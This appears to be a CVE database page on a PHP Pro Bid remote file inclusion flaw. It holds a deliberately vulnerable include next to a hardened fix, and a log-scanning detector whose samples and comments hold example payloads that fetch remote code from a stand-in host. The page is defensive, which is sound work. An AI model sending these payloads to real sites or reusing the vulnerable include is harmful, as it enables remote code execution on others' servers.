CVE-2009-0970
Published 2009-03-19
PHP remote file inclusion vulnerability in includes/class_image.php in PHP Pro Bid 6.05 (requires register_globals enabled)
Priority: P431 · medium · CVSS 2.0 base score 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EPSS: 1.80% (75.7th percentile)
PHP remote file inclusion vulnerability in includes/class_image.php in PHP Pro Bid 6.05, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the fileExtension parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
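The description only says that a URL in the `fileExtension` parameter reaches an include when `register_globals` is on. The PHP below is an added illustration written for this page, not PHP Pro Bid's code: the actual include statement in `includes/class_image.php` is not reproduced, and the function names, the handler file names and the extension-to-file mapping are assumptions chosen to show the typical shape of a register_globals-dependent RFI next to a hardened version that never builds an include path from request data.

```php
<?php
// Added illustration for this page; NOT code from PHP Pro Bid. The real include
// in includes/class_image.php is not reproduced here. Function names, handler
// file names and the extension -> file mapping are assumptions.
declare(strict_types=1);

// --- Vulnerable shape (assumed) --------------------------------------------
// With register_globals=On, a request such as
//   GET /includes/class_image.php?fileExtension=http://198.51.100.9/x.txt%3F
// creates $fileExtension before any of this code runs. Nothing assigns it
// locally, so the include path is fully attacker controlled. The trailing '?'
// turns the appended '.php' into a query string on the remote URL, and the
// fetched body is executed as PHP (needs allow_url_include=On on PHP >= 5.2).
function load_image_handler_vulnerable(): void
{
    global $fileExtension;             // populated by register_globals, never set here
    include $fileExtension . '.php';   // remote file inclusion
}

// --- Hardened shape ----------------------------------------------------------
// Map a small set of known extensions to fixed local files; reject everything
// else. No trimming or normalisation beyond lower-casing, so "jpg\0" and
// "http://..." are not found in the map and are refused.
const IMAGE_HANDLERS = [
    'jpg' => 'image_jpg.php',
    'gif' => 'image_gif.php',
    'png' => 'image_png.php',
];

function resolve_image_handler(string $requested): string
{
    $ext = strtolower($requested);
    if (!array_key_exists($ext, IMAGE_HANDLERS)) {
        throw new InvalidArgumentException('unsupported image type: 0x' . bin2hex($requested));
    }
    return __DIR__ . '/handlers/' . IMAGE_HANDLERS[$ext];
}

function load_image_handler_safe(): void
{
    // Read the parameter explicitly instead of trusting a global that may or
    // may not have been injected by register_globals.
    $requested = filter_input(INPUT_GET, 'fileExtension', FILTER_DEFAULT);
    $requested = is_string($requested) ? $requested : 'jpg';
    include resolve_image_handler($requested);
}

// Offline check of the allow-list logic (no include is performed).
foreach (['PNG', 'http://198.51.100.9/x.txt?', "jpg\0", 'php://input'] as $probe) {
    try {
        echo 'accepted: ', resolve_image_handler($probe), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Only the first probe is accepted. Independently of any application fix, the vector described on this page needs two interpreter settings: `register_globals=On` (the option was removed in PHP 5.4) and `allow_url_include=On` (off by default since PHP 5.2). Checking `ini_get('register_globals')` and `ini_get('allow_url_include')` on the running interpreter, not just in php.ini, tells you whether a host is exposed to this class of bug at all.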
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpprobid | php_pro_bid | — | — |
No fixed version is recorded, and the NVD text notes that the details come solely from third-party information. A mitigation that does not depend on a vendor patch: run with register_globals=Off (the option was removed in PHP 5.4) and allow_url_include=Off (the default since PHP 5.2); without both settings enabled the attack described above cannot pull and execute a remote file.
CVSS provenance
NVD (CVSS 2.0): 6.8 MEDIUM, AV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat: 7.5 HIGH. This is the score shown in the Red Hat entry on this page for CVE-2009-0653 (OpenSSL); it does not rate the PHP Pro Bid issue.
GHSA
GHSA-wp22-wqwx-2pc9 (ghsa_unreviewed, 2022-05-02): CVE-2009-0970, MEDIUM, CWE-94
Advisory text is identical to the NVD description above: PHP remote file inclusion vulnerability in includes/class_image.php in PHP Pro Bid 6.05, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the fileExtension parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Red Hat
CVE-2009-0653 (vendor_redhat, CVSS 7.5, HIGH): OpenSSL, probably 0.9.6, does not verify the Basic Constraints for an intermediate CA-signed certificate, which allows remote attackers to spoof the certificates of trusted sites via a man-in-the-middle attack, a related issue to CVE-2002-0970.
Statement: Not vulnerable. This issue was addressed in upstream OpenSSL prior to 0.9.6 and therefore does not affect the versions of OpenSSL as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
Note: this entry describes a different vulnerability (OpenSSL certificate chain validation, CVE-2009-0653, which references CVE-2002-0970). It is unrelated to PHP Pro Bid and to CVE-2009-0970, and the 7.5 score belongs to it, not to this page's CVE.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
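With no indexed detection rule, the practical check is the access log. The script below is an added example for this page, not from PHP Pro Bid or any detection vendor: it parses combined-format log lines (constructed here for the demonstration) and flags requests whose `fileExtension` value starts with a URL scheme or PHP stream wrapper, or contains a NUL byte. It matches on the parameter rather than on the script path because, with register_globals, the variable is populated for any entry script that ends up including class_image.php.

```php
<?php
// Added example for this page (not from PHP Pro Bid or a detection vendor).
// The log lines are constructed for the demonstration.
declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [19/Mar/2009:10:01:22 +0000] "GET /includes/class_image.php?fileExtension=http://198.51.100.9/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Mar/2009:10:01:30 +0000] "GET /includes/class_image.php?fileExtension=http%3A%2F%2F198.51.100.9%2Fx.txt%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [19/Mar/2009:10:02:05 +0000] "GET /item.php?id=123 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.44 - - [19/Mar/2009:10:02:09 +0000] "GET /includes/class_image.php?fileExtension=jpg HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Mar/2009:10:03:41 +0000] "GET /index.php?fileExtension=php://input HTTP/1.1" 200 300 "-" "curl/7.19"
LOG;

// Values that turn include() into remote or wrapper-based execution, plus a
// NUL byte, which older PHP used to truncate an appended suffix such as '.php'.
const RFI_VALUE_PATTERN = '~^(?:https?|ftps?|php|data|expect|phar|glob|compress\.zlib)://|\x00~i';

/**
 * Return one record per suspicious request: ip, time, request target, decoded value.
 * Matching is on the parameter, not the script path: with register_globals the
 * variable exists for any script that includes class_image.php.
 */
function rfi_suspects(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Common/combined log format: ip ident user [time] "METHOD target PROTO" ...
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
            continue;
        }
        [, $ip, $time, , $target] = $m;
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue;
        }
        parse_str(substr($target, $qpos + 1), $params);   // percent-decodes once
        if (!isset($params['fileExtension']) || !is_string($params['fileExtension'])) {
            continue;
        }
        $value = $params['fileExtension'];
        if (preg_match(RFI_VALUE_PATTERN, $value)) {
            $hits[] = ['ip' => $ip, 'time' => $time, 'target' => $target, 'value' => $value];
        }
    }
    return $hits;
}

foreach (rfi_suspects(SAMPLE_LOG) as $hit) {
    printf("%s %s %s -> %s\n", $hit['time'], $hit['ip'], $hit['target'],
        addcslashes($hit['value'], "\0..\37"));
}
```

On the sample above this reports three requests: the two from 203.0.113.7 (plain and percent-encoded URL, the second with a NUL suffix) and the `php://input` probe against index.php; the `fileExtension=jpg` request and the unrelated item.php hit are ignored. Percent-decoding happens once in `parse_str`, so double-encoded payloads would still slip past this pass and a production rule should decode until stable.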
References
http://secunia.com/advisories/34278
http://www.osvdb.org/52750
http://www.securityfocus.com/bid/34145
https://exchange.xforce.ibmcloud.com/vulnerabilities/49290